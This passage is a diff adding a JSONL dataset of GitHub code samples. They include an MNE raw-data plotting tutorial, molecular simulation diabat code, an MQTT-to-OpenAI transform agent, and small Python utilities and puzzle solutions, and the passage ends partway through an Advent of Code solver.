diff --git "a/3633.jsonl" "b/3633.jsonl" new file mode 100644--- /dev/null +++ "b/3633.jsonl" @@ -0,0 +1,2099 @@ +{"seq_id":"73034986613","text":"\"\"\"\n.. _tut_viz_raw:\n\nVisualize Raw data\n==================\n\n\"\"\"\nimport os.path as op\nimport numpy as np\n\nimport mne\n\ndata_path = op.join(mne.datasets.sample.data_path(), 'MEG', 'sample')\nraw = mne.io.read_raw_fif(op.join(data_path, 'sample_audvis_raw.fif'))\nraw.set_eeg_reference() # set EEG average reference\nevents = mne.read_events(op.join(data_path, 'sample_audvis_raw-eve.fif'))\n\n###############################################################################\n# The visualization module (:mod:`mne.viz`) contains all the plotting functions\n# that work in combination with MNE data structures. Usually the easiest way to\n# use them is to call a method of the data container. All of the plotting\n# method names start with ``plot``. If you're using Ipython console, you can\n# just write ``raw.plot`` and ask the interpreter for suggestions with a\n# ``tab`` key.\n#\n# To visually inspect your raw data, you can use the python equivalent of\n# ``mne_browse_raw``.\nraw.plot(block=True)\n\n###############################################################################\n# The channels are color coded by channel type. Generally MEG channels are\n# colored in different shades of blue, whereas EEG channels are black. The\n# scrollbar on right side of the browser window also tells us that two of the\n# channels are marked as ``bad``. Bad channels are color coded gray. By\n# clicking the lines or channel names on the left, you can mark or unmark a bad\n# channel interactively. You can use +/- keys to adjust the scale (also = works\n# for magnifying the data). Note that the initial scaling factors can be set\n# with parameter ``scalings``. If you don't know the scaling factor for\n# channels, you can automatically set them by passing scalings='auto'. With\n# ``pageup/pagedown`` and ``home/end`` keys you can adjust the amount of data\n# viewed at once.\n#\n# You can enter annotation mode by pressing ``a`` key. In annotation mode you\n# can mark segments of data (and modify existing annotations) with the left\n# mouse button. You can use the description of any existing annotation or\n# create a new description by typing when the annotation dialog is active.\n# Notice that the description starting with the keyword ``'bad'`` means that\n# the segment will be discarded when epoching the data. Existing annotations\n# can be deleted with the right mouse button. Annotation mode is exited by\n# pressing ``a`` again or closing the annotation window. See also\n# :class:`mne.Annotations` and :ref:`marking_bad_segments`. To see all the\n# interactive features, hit ``?`` key or click ``help`` in the lower left\n# corner of the browser window.\n#\n# The channels are sorted by channel type by default. You can use the ``order``\n# parameter of :func:`raw.plot ` to group the channels in a\n# different way. ``order='selection'`` uses the same channel groups as MNE-C's\n# mne_browse_raw (see :ref:`CACCJEJD`). The selections are defined in\n# ``mne-python/mne/data/mne_analyze.sel`` and by modifying the channels there,\n# you can define your own selection groups. Notice that this also affects the\n# selections returned by :func:`mne.read_selection`. By default the selections\n# only work for Neuromag data, but ``order='position'`` tries to mimic this\n# behavior for any data with sensor positions available. 
The channels are\n# grouped by sensor positions into 8 evenly sized regions. Notice that for this\n# to work effectively, all the data channels in the channel array must be\n# present. The ``order`` parameter can also be passed as an array of ints\n# (picks) to plot the channels in the given order.\nraw.plot(order='selection')\n\n###############################################################################\n# We read the events from a file and pass them as a parameter when calling the\n# method. The events are plotted as vertical lines so you can see how they\n# align with the raw data.\n#\n# We can check where the channels reside with ``plot_sensors``. Notice that\n# this method (along with many other MNE plotting functions) is callable using\n# any MNE data container where the channel information is available.\nraw.plot_sensors(kind='3d', ch_type='mag', ch_groups='position')\n\n###############################################################################\n# We used ``ch_groups='position'`` to color code the different regions. It uses\n# the same algorithm for dividing the regions as ``order='position'`` of\n# :func:`raw.plot <mne.io.Raw.plot>`. You can also pass a list of picks to\n# color any channel group with different colors.\n#\n# Now let's add some SSP projectors to the raw data. Here we read them from a\n# file and plot them.\nprojs = mne.read_proj(op.join(data_path, 'sample_audvis_eog-proj.fif'))\nraw.add_proj(projs)\nraw.plot_projs_topomap()\n\n###############################################################################\n# The first three projectors that we see are the SSP vectors from empty room\n# measurements to compensate for the noise. The fourth one is the average EEG\n# reference. These are already applied to the data and can no longer be\n# removed. The next six are the EOG projections that we added. Every data\n# channel type has two projection vectors. Let's try the raw browser again.\nraw.plot()\n\n###############################################################################\n# Now click the `proj` button at the lower right corner of the browser\n# window. A selection dialog should appear, where you can toggle the projectors\n# on and off. Notice that the first four are already applied to the data and\n# toggling them does not change the data. However, the newly added projectors\n# modify the data to get rid of the EOG artifacts. Note that toggling the\n# projectors here doesn't actually modify the data. This is purely for visually\n# inspecting the effect. See :func:`mne.io.Raw.del_proj` to actually remove the\n# projectors.\n#\n# The Raw container also lets us easily plot the power spectra over the raw\n# data. Here we plot the data using `spatial_colors` to map the line colors to\n# channel locations (default in versions >= 0.15.0). Another option is to use\n# the `average` (default in < 0.15.0). See the API documentation for more info.\nraw.plot_psd(tmax=np.inf, average=False)\n\n###############################################################################\n# Plotting channel-wise power spectra is just as easy. The layout is inferred\n# from the data by default when plotting topo plots. This works for most data,\n# but it is also possible to define the layouts by hand. Here we select a\n# layout with only magnetometer channels and plot it.
Then we plot the channel\n# wise spectra of first 30 seconds of the data.\nlayout = mne.channels.read_layout('Vectorview-mag')\nlayout.plot()\nraw.plot_psd_topo(tmax=30., fmin=5., fmax=60., n_fft=1024, layout=layout)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mne-tools_mne-python/mne-python-master/tutorials/plot_visualize_raw.py","file_name":"plot_visualize_raw.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1784982090","text":"import torch\nfrom schnetpack.interfaces.ase_interface import AtomsConverter\nfrom schnetpack.transform.neighborlist import TorchNeighborList, APNetNeighborList, APNetPBCNeighborList\nfrom schnetpack.transform import CastTo32, FDSetup, FDSetup_SchNet\nimport numpy as np\nfrom ase import Atoms\nimport time\nfrom ase.calculators.calculator import Calculator, all_changes\nfrom ase.geometry import get_distances\nimport pickle\n\ndef shift_reacting_atom(positions, react_residue, box):\n \"\"\"\n Some OpenMM forces need a residue to not be split by \n periodic boundaries, and the \"wrap\" function in the \n calculator function only wraps residues according to\n the H11 topology, which may result in spliting the \n reacting residue across a periodic boundary. This\n function ensures that the reacting atom is wrapped\n back to the principal box with the other atoms in\n the reacting residue\n\n Parameters\n -----------\n positions : np.ndarray\n Positions array\n react_residue : list\n Indices of the reacting_residue\n box : object\n ASE cell object\n\n Returns\n ----------\n positions : np.ndarray\n Positions with the shifted atom position\n \"\"\"\n react_positions = positions[react_residue]\n #Get distances (w/o minimum image) using the ASE get_distances function \n #from atom 0 in the residue to the rest of the atoms in the residue\n D, D_len = get_distances(react_positions[0], react_positions[1:])\n\n D_mic, D_len_mic = get_distances(react_positions[0], react_positions[1:], cell=box, pbc=True)\n #Determine if there is a difference between the minimum image distances and the non-minimum imaged\n #distances\n diff = D - D_mic\n\n positions[react_residue[1:]] -= diff[0]\n return positions\n\ndef reorder(array, traj_inds):\n \"\"\"\n Sometimes we want to reorder forces or position from the diabat 2 ordering to the diabat 1 ordering\n Parameters\n -----------\n forces : np.ndarray\n np array containing either forces or positions\n traj_inds : list\n list of ints containing the location of each atom from diabat 1 in diabat 2\n\n Returns\n -----------\n array[reord_list] : np.ndarray\n reorderd array\n \"\"\"\n reord_list = [traj_inds.index(i) for i in range(len(traj_inds))]\n return array[reord_list]\n\nclass NN_Intra(Calculator):\n \"\"\"\n Class for obtaining the energies and forces from SchNetPack\n neural networks, designed for single molecules intramolecular interactions\n \"\"\"\n energy = \"energy\"\n forces = \"forces\"\n implemented_properties = [energy, forces]\n\n def __init__(self, model, force_atoms, damping=None, device='cuda', **kwargs):\n \"\"\"\n Parameters\n -----------\n model : str\n location of the neural network model for the monomer\n force_atoms : list\n List of atom indices that correspond to the atoms the neural network is applied to\n damping : list\n Indices of atoms that the damping function will be applied to\n device : str\n String indicating where the neural networks will be run. 
Default is cuda.\n \"\"\"\n Calculator.__init__(self, **kwargs)\n\n self.model = torch.load(model).to(torch.device(device))\n self.nn_force_atoms = force_atoms\n transforms = []\n if damping:\n fd_setup = FDSetup_SchNet(damping[0], damping[1])\n transforms.append(fd_setup)\n transforms.append(CastTo32())\n neighbor_list = TorchNeighborList(8.0)\n self.converter = AtomsConverter(neighbor_list=neighbor_list, transforms=transforms, device=\"cuda\")\n\n def calculate(self, atoms=None, properties=['energy'], system_changes=all_changes):\n \"\"\"\n Compute the energy for the intramolecular energies\n\n Parameters\n -----------\n atoms : ASE Atoms Object\n ASE Atoms Object used as the input for the neural networks.\n properties : list\n Properties that the ASE class is trying to get\n system_changes : list\n List of changes detected by the ASE class\n \"\"\"\n self.results = {}\n Calculator.calculate(self, atoms)\n\n atoms = atoms[self.nn_force_atoms]\n inputs = self.converter(atoms)\n result = self.model(inputs)\n energy = result[\"y\"].detach().cpu().numpy()\n forces = result[\"dr_y\"].detach().cpu().numpy()\n forces[forces!=forces] = 0\n self.results[\"energy\"] = energy\n self.results[\"forces\"] = forces\n\nclass NN_Inter:\n \"\"\"\n Class for obtaining the energies and forces from SchNetPack\n neural networks, designed for intermolecular dimer interactions.\n \"\"\"\n def __init__(self, model, res_list, ZA, ZB, damping=None, pbc=True, device='cuda'):\n \"\"\"\n Parameters\n -----------\n model : str\n location of the neural network model for the dimer\n res_list : list\n List of atom indices that correspond to the atoms the neural network is applied to\n ZA : np.ndarray\n Atomic numbers of residue 1\n ZB : np.ndarray\n Atomic numbers of residue 2\n damping : list\n List of atoms that the damping function is applied to\n pbc : bool\n Whether minimum image functions need to be used\n device : str\n String indicating where the neural networks will be run. 
Default is cuda.\n \"\"\"\n self.model = torch.load(model).to(torch.device(device))\n self.res_list = res_list\n self.nn_force_atoms = np.asarray([atom_id for res in res_list for atom_id in res])\n self.nn_force_atoms = self.nn_force_atoms.astype(int)\n nn_res_list = [[i for i in range(len(res_list[0]))]]\n monomer_2 = [i for i in range(res_list[0][-1]+1, res_list[0][-1]+1+len(res_list[1]))]\n nn_res_list.append(monomer_2)\n self.device = device\n transforms = []\n \n if damping:\n fd_setup = FDSetup(damping[0], damping[1])\n transforms.append(fd_setup)\n\n transforms.append(CastTo32())\n if pbc:\n neighbor_list = APNetPBCNeighborList(ZA, ZB)\n else:\n neighbor_list = APNetNeighborList(ZA, ZB)\n\n self.converter = AtomsConverter(neighbor_list=neighbor_list, transforms=transforms, device=self.device)\n\n def compute_energy_force(self, atoms, total_forces, atom_potential=None):\n \"\"\"\n Compute the energy for the intramolecular components of the dimer\n\n Parameters\n -----------\n atoms : ASE Atoms Object\n ASE Atoms Object used as the input for the neural networks.\n total_forces : np.ndarray\n numpy array containing the total intramolecular forces for a diabat\n atom_potential : optional, np.ndarray\n Contains the external electric potential on each atom if the model uses this\n\n Returns\n -----------\n energy : np.ndarray\n Intramoleculer energy in kJ/mol\n forces : np.ndarray\n Intramolecular forces in kJ/mol/A\n \"\"\"\n inputs = self.converter(atoms[self.nn_force_atoms])\n if atom_potential is not None:\n inputs[\"potential_solvent_A\"] = torch.from_numpy(atom_potential[self.res_list[0]]).to(self.device).float()\n inputs[\"potential_solvent_B\"] = torch.from_numpy(atom_potential[self.res_list[1]]).to(self.device).float()\n result = self.model(inputs)\n energy = result[\"y\"].detach().cpu().numpy()\n forces = result[\"dr_y\"].detach().cpu().numpy()\n forces[forces!=forces] = 0\n total_forces[self.nn_force_atoms] += forces\n\n return np.asarray(energy), total_forces\n\nclass Diabat:\n \"\"\"\n Contains collection of terms that are used to model each diabat\n \"\"\"\n def __init__(self, openmm, nn_intra_opts, nn_inter_opts, reorder_graph=None, shift=0):\n \"\"\"\n Parameters\n -----------\n openmm_opts : dictionary\n collection of options needed to start OpenMM\n nn_intra_opts : dictionary\n collection of options need to initialize NN_Intra classes\n nn_inter_opts : dictionary\n collection of options needed to initialize NN_Inter classes\n reorder_graph : GraphReorder object\n (optional) object that reorders the diabat 1 positions to another diabat. Not needed for diabat 1\n shift : float\n (optional) shift diabat 2 to be on the same energy level as diabat 1. 
The electronic energy\n of the isolated monomers \n \"\"\"\n self.openmm = openmm\n if nn_intra_opts:\n self._setup_nnintra(nn_intra_opts)\n if nn_inter_opts:\n self._setup_nninter(nn_inter_opts)\n self.reorder_graph = reorder_graph\n self.shift = shift\n\n def _setup_nnintra(self, nnintra_opts):\n \"\"\"\n Parameters\n -----------\n nnintra_opts : dictionary\n list of options needed to create the NN_Intra class\n \"\"\"\n self.nnintra = []\n for opt in nnintra_opts:\n model = opt['fname']\n indices = opt[\"atom_index\"]\n if \"damping_parent\" in opt.keys():\n parent_atom = opt[\"damping_parent\"]\n dissoc_atom = opt[\"damping_dissoc\"]\n parent_atom = parent_atom.split(',')\n parent_atom = [int(i) for i in parent_atom]\n if not isinstance(dissoc_atom, list): dissoc_atom = list(dissoc_atom)\n dissoc_atom = [int(i) for i in dissoc_atom]\n nnintra = NN_Intra(model, indices, damping=[parent_atom, dissoc_atom])\n else:\n nnintra = NN_Intra(model, indices)\n self.nnintra.append(nnintra)\n\n def _setup_nninter(self, nninter_opts):\n \"\"\"\n Parameters\n -----------\n nnintra_opts : dictionary\n list of options needed to create the NN_Intra class\n \"\"\"\n\n model = nninter_opts['fname']\n residue_indices = nninter_opts[\"indices\"]\n parent_atom = nninter_opts[\"damping_parent\"]\n dissoc_atom = nninter_opts[\"damping_dissoc\"]\n ZA = np.asarray(nninter_opts[\"ZA\"])\n ZB = np.asarray(nninter_opts[\"ZB\"])\n parent_atom = parent_atom.split(',')\n parent_atom = [int(i) for i in parent_atom]\n dissoc_atom = dissoc_atom.split(',')\n dissoc_atom = [int(i) for i in dissoc_atom]\n\n self.nninter = NN_Inter(model, residue_indices, ZA, ZB, damping=[parent_atom, dissoc_atom])\n\n def compute_energy_force(self, atoms, potential=None, field=None, atom_potential=None):\n \"\"\"\n Parameters\n -----------\n atoms : ASE atoms object\n atoms object\n potential : float, optional\n add potential energy from external potential if present (usually only for a training step\n field : np.ndarray, optional\n add forces from the external field if present\n atom_potential : np.ndarray, optional\n external potential on each atom\n\n Returns\n -----------\n energy : np.ndarray\n Contains the energy for a particular configuration\n forces : np.ndarray\n Contains the forces (ordered in diabat 1) for a particular configuration\n \"\"\"\n #Determine if the Diabat object contains a GraphReorder class\n if self.reorder_graph:\n new_atoms, indices = self.reorder_graph.reorder(atoms)\n else:\n new_atoms = atoms\n indices = np.arange(len(new_atoms)).astype(int).tolist()\n\n if self.openmm.cutoff:\n res_list = self.openmm.res_list()\n react_residue = res_list[self.openmm.react_residue]\n positions = shift_reacting_atom(new_atoms.get_positions(), react_residue, new_atoms.get_cell())\n new_atoms.set_positions(positions)\n \n #Initialize a zeros array in order to contain all the forces\n total_forces = np.zeros_like(new_atoms.get_positions())\n \n openmm_energy, openmm_forces = self.compute_openmm_energy(new_atoms)\n \n #Loop through the NN_Intra classes and get the energies and forces\n nnintra_energy, total_forces = self.compute_nn_intra(new_atoms, total_forces)\n #Get the NN_Inter energy/force\n nninter_energy, total_forces = self.nninter.compute_energy_force(new_atoms, total_forces, atom_potential)\n \n #Combine the SAPT-FF energy/force with the neural network energy/force\n energy = openmm_energy + nnintra_energy + nninter_energy + self.shift\n forces = openmm_forces + total_forces\n \n if potential:\n energy += potential\n 
forces += field\n \n #Reorder with the current indices\n forces = reorder(forces, indices)\n return energy, forces\n\n def compute_openmm_energy(self, atoms):\n \"\"\"\n Get energy from OpenMM\n\n Parameters\n -----------\n atoms : ASE atoms object\n atoms\n\n Returns \n -----------\n oprnmm_energy : np.ndarray\n OpenMM Energy in kJ/mol\n openmm_forces : np.ndarray\n OpenMM Forces in kJ/mol/A\n \"\"\"\n #Set initial positions\n self.openmm.set_initial_positions(atoms.get_positions())\n self.openmm.calculate(atoms=atoms)\n openmm_energy = self.openmm.results[\"energy\"]\n openmm_forces = self.openmm.results[\"forces\"]\n\n return openmm_energy, openmm_forces\n\n def compute_nn_intra(self, atoms, total_forces):\n \"\"\"\n Loop through all NN Intra models and get energy and force\n\n Parameters\n -----------\n atoms : ASE atoms object\n atoms\n total_forces : np.ndarray\n Array for which to add all forces from the NN models\n\n Returns \n -----------\n nnintra_energy : np.ndarray\n NN_Intra Energy in kJ/mol\n total_forces : np.ndarray\n Contains the forces from all the NN models\n \"\"\"\n\n nnintra_energy = 0\n for nnintra in self.nnintra:\n nnintra.calculate(atoms=atoms)\n energy = nnintra.results[\"energy\"]\n forces = nnintra.results[\"forces\"]\n nnintra_energy += energy\n total_forces[nnintra.nn_force_atoms] += forces\n return nnintra_energy, total_forces\n\n","repo_name":"jstoppelman/PBNN","sub_path":"nn/diabat.py","file_name":"diabat.py","file_ext":"py","file_size_in_byte":14468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73187808691","text":"from . import env\n\nimport openai\nimport json\nimport paho.mqtt.client as mqtt\nimport time\nimport uuid\n\nopenai.api_key = env.OPENAI_API_KEY\n\ndef millis() -> int:\n return int(time.time() * 1000)\n\nenv_config = {\n 'chat-gpt-model': env.GPT_MODEL,\n 'system-prompt': env.GPT_SYSTEM_PROMPT,\n 'user-prompt': env.GPT_USER_PROMPT if env.GPT_USER_PROMPT else None,\n 'output-json': env.OUTPUT_JSON\n}\n\nconfig = {\n 'chat-gpt-model': env.GPT_MODEL,\n 'system-prompt': env.GPT_SYSTEM_PROMPT,\n 'user-prompt': env.GPT_USER_PROMPT if env.GPT_USER_PROMPT else None,\n 'output-json': env.OUTPUT_JSON\n}\n\n\nDEBUG = env.DEBUG\n\nroot_topic = f'gpt-transform-v1/{env.AGENT_NAME}/'\n\nconfig_topic = root_topic + 'config'\nlog_topic = root_topic + 'metrics/logs/debug'\nstatus_topic = root_topic + 'metrics/status'\n\n\ndef publish_config(client: mqtt.Client, initial: bool = False):\n client.publish(config_topic, json.dumps({'timestamp': millis(), 'config': config, 'initial-publish': initial}), retain=True)\n\n\ndef on_config_change(client, userdata, message):\n try:\n new_config = json.loads(message.payload.decode())\n except Exception as err:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'error': str(err), 'function': 'on_config_change(client, userdata, message)'}))\n return\n\n if new_config.get('initial-publish'):\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'Ignoring initial publish of config', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n new_config = new_config.get('config')\n if not new_config:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'error': 'New Config Published without \"config\" key', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n #env_config = True\n config_changed = False\n try:\n for key, value in new_config.items():\n # if 
key not in env_config.keys() or value != env_config[key]:\n # env_config = False\n if key not in config.keys() or value == config[key]:\n # Ignore Keys that don't belong\n continue\n config[key] = value\n config_changed = True\n \n\n except Exception as err:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'config': config, 'error': str(err), 'function': 'on_config_change(client, userdata, message)'}))\n return\n\n if not config_changed:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'new unchanged config received', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'Config changed successfully', 'function': 'on_config_change(client, userdata, message)'}))\n\n\ndef on_incoming_data(client, userdata, message):\n '''\n Transform Data and publish transformed data to publish topic\n '''\n start = millis()\n message_uuid = str(uuid.uuid4())\n \n prompt = [\n {'role': 'system', 'content': config['system-prompt']},\n {'role': 'user', 'content': f'{config[\"user-prompt\"]}\\n\\n{message.payload.decode()}' if config['user-prompt'] else f'{message.payload.decode()}'}\n ]\n\n chat_params = dict(\n model=config['chat-gpt-model'],\n messages=prompt\n )\n\n if config['output-json']:\n chat_params['response_format'] = {'type': 'json_object'}\n\n chat_response = openai.ChatCompletion.create(**chat_params)\n\n response_content = chat_response['choices'][0]['message']['content']\n\n end = millis()\n response = {\n 'uuid': message_uuid,\n 'received-ts': start,\n 'processed-ts': end,\n 'response-content': response_content,\n 'process-time': end - start,\n **chat_response['usage']\n }\n client.publish(env.MQTT_PUBLISH_TOPIC, response_content)\n client.publish(root_topic+'metrics/message-processed', json.dumps(response))\n\n\ndef on_connect(client, userdata, flags, rc):\n client.publish(status_topic, json.dumps({'state': 'ONLINE', 'ts': millis()}), retain=True)\n if DEBUG:\n client.publish(log_topic, f'Client Connected: {env.AGENT_NAME}')\n\n client.message_callback_add(env.MQTT_SUBSCRIBE_TOPIC, on_incoming_data)\n client.message_callback_add(config_topic, on_config_change)\n\n client.subscribe(config_topic)\n client.subscribe(env.MQTT_SUBSCRIBE_TOPIC)\n\n publish_config(client, initial=True)\n \n\n\ndef create_mqtt_client() -> mqtt.Client:\n client = mqtt.Client(client_id=env.MQTT_CLIENT_ID, protocol=mqtt.MQTTv311)\n\n if env.MQTT_USE_TLS:\n client.tls_set(cert_reqs=mqtt.ssl.CERT_REQUIRED)\n\n client.username_pw_set(username=env.MQTT_USERNAME, password=env.MQTT_PASSWORD)\n\n client.will_set(topic=status_topic, payload=json.dumps({'state': 'OFFLINE', 'will-set-ts': millis()}), retain=True)\n\n client.on_connect = on_connect\n\n return client\n\n\n\ndef start_app():\n mqtt_client = create_mqtt_client()\n mqtt_client.connect(host=env.MQTT_HOST, port=env.MQTT_PORT)\n mqtt_client.loop_forever()","repo_name":"mkeras/chatGPTAgent","sub_path":"source/sparkplug_init.py","file_name":"sparkplug_init.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6066830024","text":"from pathlib import Path\r\nimport pandas as pd\r\n\r\n\r\ndef get_bbox_for_image(image_id,\r\n bbox_file_path=Path('data/raw/train.csv')):\r\n \"\"\"Get the bounding boxes for the respective image from the file.\r\n\r\n Parameter\r\n ---------\r\n images_id : str\r\n Id of the image in 
question\r\n\r\n bbox_file_path : pathlib.Path\r\n Path to file containing bboxes\r\n\r\n Return\r\n ------\r\n bbox_list : list(list(float))\r\n List of all bboxes. Format: [x_pos, y_pos, width, height]\r\n \"\"\"\r\n\r\n df = pd.read_csv(bbox_file_path)\r\n\r\n df_image = df[df[\"image_id\"] == image_id]\r\n\r\n image_bbox = df_image['bbox']\r\n\r\n bbox_list = list()\r\n\r\n for i, bbox_string in image_bbox.iteritems():\r\n bbox_string = bbox_string.replace('[', '')\r\n bbox_string = bbox_string.replace(']', '')\r\n\r\n bbox_split = bbox_string.split(',')\r\n bbox = [float(value) for value in bbox_split]\r\n bbox_list.append(bbox)\r\n\r\n return bbox_list\r\n\r\n\r\nif __name__ == '__main__':\r\n get_bbox_for_image('b6ab77fd7')\r\n","repo_name":"CoffeeMugTwo/rcnn","sub_path":"src/data/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42921492442","text":"def merge(a: list, b: list) -> list:\n \"\"\"Merges B into A in sorted order\n\n a is modified in place and also returned\n\n Args:\n a: sorted list with enough buffer at the end to hold b\n b: sorted list\n\n Returns:\n A single sorted list\n \"\"\"\n end_b = len(b) - 1\n for idx, val in enumerate(a):\n if val is None:\n break\n end_a = idx - 1\n\n last = end_b + end_a + 1\n\n while end_b >= 0 and end_a >= 0:\n if a[end_a] > b[end_b]:\n a[last] = a[end_a]\n a[end_a] = None\n end_a -= 1\n else:\n a[last] = b[end_b]\n b[end_b] = None\n end_b -= 1\n last -= 1\n return a\n","repo_name":"danong/ctci-6th-solutions","sub_path":"pythonsolutions/sorting_and_searching/sorted_merge.py","file_name":"sorted_merge.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7115986426","text":"import os.path\r\nimport datetime\r\nimport shutil\r\n\r\nprint(\"Qual a pasta deseja arquivar?\")\r\np = input()\r\nif os.path.isdir(p) :\r\n dt = datetime.date.today()\r\n str = p+\"_\"+dt.isoformat();\r\n shutil.move(p,str+\"\\\\\"+p)\r\n shutil.make_archive(str,\"zip\",str)\r\n shutil.move(str+\"\\\\\"+p,p)\r\n shutil.rmtree(str);\r\nelse :\r\n print(\"Pasta \\\"\"+p+\"\\\" não localizada!\")","repo_name":"DaniloEpic/util","sub_path":"arquivar.py","file_name":"arquivar.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41188328226","text":"import sys\nimport csv\nfrom tabulate import tabulate\n\ndef main():\n file = check_arguments()\n table = file_opener(file)\n print(tabulate(table, headers=\"keys\", tablefmt=\"grid\"))\n\ndef check_arguments():\n if len(sys.argv) <= 1:\n sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) > 2:\n sys.exit(\"Too many command-line arguments\")\n else:\n csv_check = sys.argv[1].split(\".\")[-1]\n if csv_check != \"csv\":\n sys.exit(\"Not a CSV file\")\n else:\n return sys.argv[1]\n\ndef file_opener(file):\n lst = []\n try:\n with open(file) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n lst.append(row)\n return lst\n except FileNotFoundError:\n sys.exit(\"File does not exist\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"smkatash/CS50_python_2022","sub_path":"week06/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} 
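For context on the pizza.py record above, a minimal sketch of how rows from csv.DictReader feed tabulate(headers="keys"): each row is a dict, and the dict keys become the column headers. The menu rows below are hypothetical sample data, not taken from the original repository.

# Hypothetical usage sketch (not from the original repo): DictReader yields
# one dict per CSV row; tabulate(..., headers="keys") promotes the dict keys
# to column headers, matching the pizza.py call above.
from tabulate import tabulate

rows = [
    {"Regular Pizza": "Cheese", "Small": "$13.50", "Large": "$18.95"},
    {"Regular Pizza": "1 topping", "Small": "$14.75", "Large": "$20.95"},
]
print(tabulate(rows, headers="keys", tablefmt="grid"))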
+{"seq_id":"13789126000","text":"'''\nDay 16\nhttps://adventofcode.com/2020/day/16\n'''\nimport util\nimport csv\nimport pandas as pd\n\n\ndef task1(tickets, valid_range):\n '''\n Solver for task 1. Identifies the error rate and valid tickets\n\n Inputs:\n tickets (lst of lst of ints): All the valid tickets as determined by \n task 1\n valid_range (lst of tuples): list of all bounds of all the ranges\n field_names (lst of strs): corresponding names to ranges\n \n Returns: \n error_rate (int): The sum of all the integers that don't fit into any \n field\n valid_tickets (lst of lst of ints): a list of tickets where every \n column fits into some range\n '''\n error_rate = 0\n valid_tickets=[]\n for ticket in tickets:\n add_ticket = True\n for number in ticket:\n if not is_valid(number, valid_range):\n error_rate += number\n add_ticket = False\n if add_ticket:\n valid_tickets.append(ticket)\n return error_rate, valid_tickets\n\n\ndef task2(tickets, valid_range, field_names):\n '''\n Solver for task 2\n\n Inputs:\n tickets (lst of lst of ints): All the valid tickets as determined by \n task 1\n valid_range (lst of tuples): list of all bounds of all the ranges\n field_names (lst of strs): corresponding names to ranges\n \n Returns: an integer containing the product of the six values on your ticket \n that correspond to fields with the word departure\n '''\n valid_dict = {}\n for i,_ in enumerate(tickets[0]):\n valid_dict[i+1] = [name for name in field_names]\n num_fields = len(valid_range)\n for ticket in tickets:\n for pos, number in enumerate(ticket):\n for i in range(0, num_fields, 2):\n if not is_valid(number, valid_range[i: i+2]):\n valid_dict[pos+1].remove(field_names[i//2])\n dict_lst = simplify_dict(valid_dict)\n to_multiply = []\n my_ticket = valid_tickets[-1]\n result = 1\n for key, value in dict_lst:\n if value[0].split()[0] == \"departure\":\n result *= my_ticket[key-1]\n return result\n\n\ndef simplify_dict(d):\n '''\n Recursive helper function that takes a dictionary and determines how to \n each key to a unique value. 
Note this only works if one key has only one \n    value and, once you remove that value, another key only has one value \n    and so on.\n\n    Inputs: d (dict): The dictionary mapping columns to potential field names\n\n    Returns: list of tuples containing the column number and the field name it \n        maps to\n    '''\n    if len(d) == 1:\n        return list(d.items())\n    else:\n        single_key = None\n        single_value = None\n        for key, value in d.items():\n            if len(value) == 1:\n                single_key = key\n                single_value = value\n                break\n        d.pop(single_key)\n        for key, value in d.items():\n            if single_value[0] in value:\n                value.remove(single_value[0])\n        remaining_lst = simplify_dict(d)\n        return remaining_lst + [(single_key, single_value)]\n \n\ndef is_valid(num, valid_range):\n    '''\n    Checks whether number is in any valid range\n\n    inputs: num - an integer\n        valid_range: a list of length 2 lists containing the valid ranges\n\n    outputs: boolean\n    '''\n    for lb, ub in valid_range:\n        if num >= lb and num <= ub:\n            return True\n    return False\n\n\ndef create_ranges(file):\n    '''\n    Creates a list of ranges for the fields.\n\n    Inputs: \n        file (file): The file containing the ranges and field names\n\n    Returns: rv (list of tuples): list containing tuples of (lb, ub)\n    '''\n    rv = []\n    field = util.read_strs(file, sep = '\\n')\n    for line in field:\n        words = line.split()\n        int_1 = words[-3]\n        int_2 = words[-1]\n        intv_1, intv_2 = text_to_range(int_1), text_to_range(int_2)\n        rv.append(intv_1)\n        rv.append(intv_2)\n    return rv\n\n\ndef text_to_range(intg):\n    '''\n    Splits str ranges into a list with integers for lower and upper bounds\n\n    Inputs:\n        intg (str): Not my best variable name, the string 'lb-ub'\n    \n    Returns: list of ints containing lower bound and upper bound\n    '''\n    splt_intv = intg.split(\"-\")\n    return [int(splt_intv[0]), int(splt_intv[1])]\n\n\nif __name__ == \"__main__\":\n    # Read in data\n    ranges = create_ranges(\"inputs/day16_inputranges.txt\")\n    test_ranges = [[1, 3], [5, 7], [6, 11], [33, 44], [13, 40],[45, 50]]\n    test_tickets = [[7,3,47], [40,4,50], [55,2,20], [38,6,12]]\n    df = pd.read_csv(\"inputs/day16_input.csv\")\n    nearby_tickets = df.values.tolist()\n    util.call_and_print(task1, test_tickets, test_ranges) \n    util.call_and_print(task1, nearby_tickets, ranges) \n    names = ['departure location', 'departure station', 'departure platform',\n             'departure 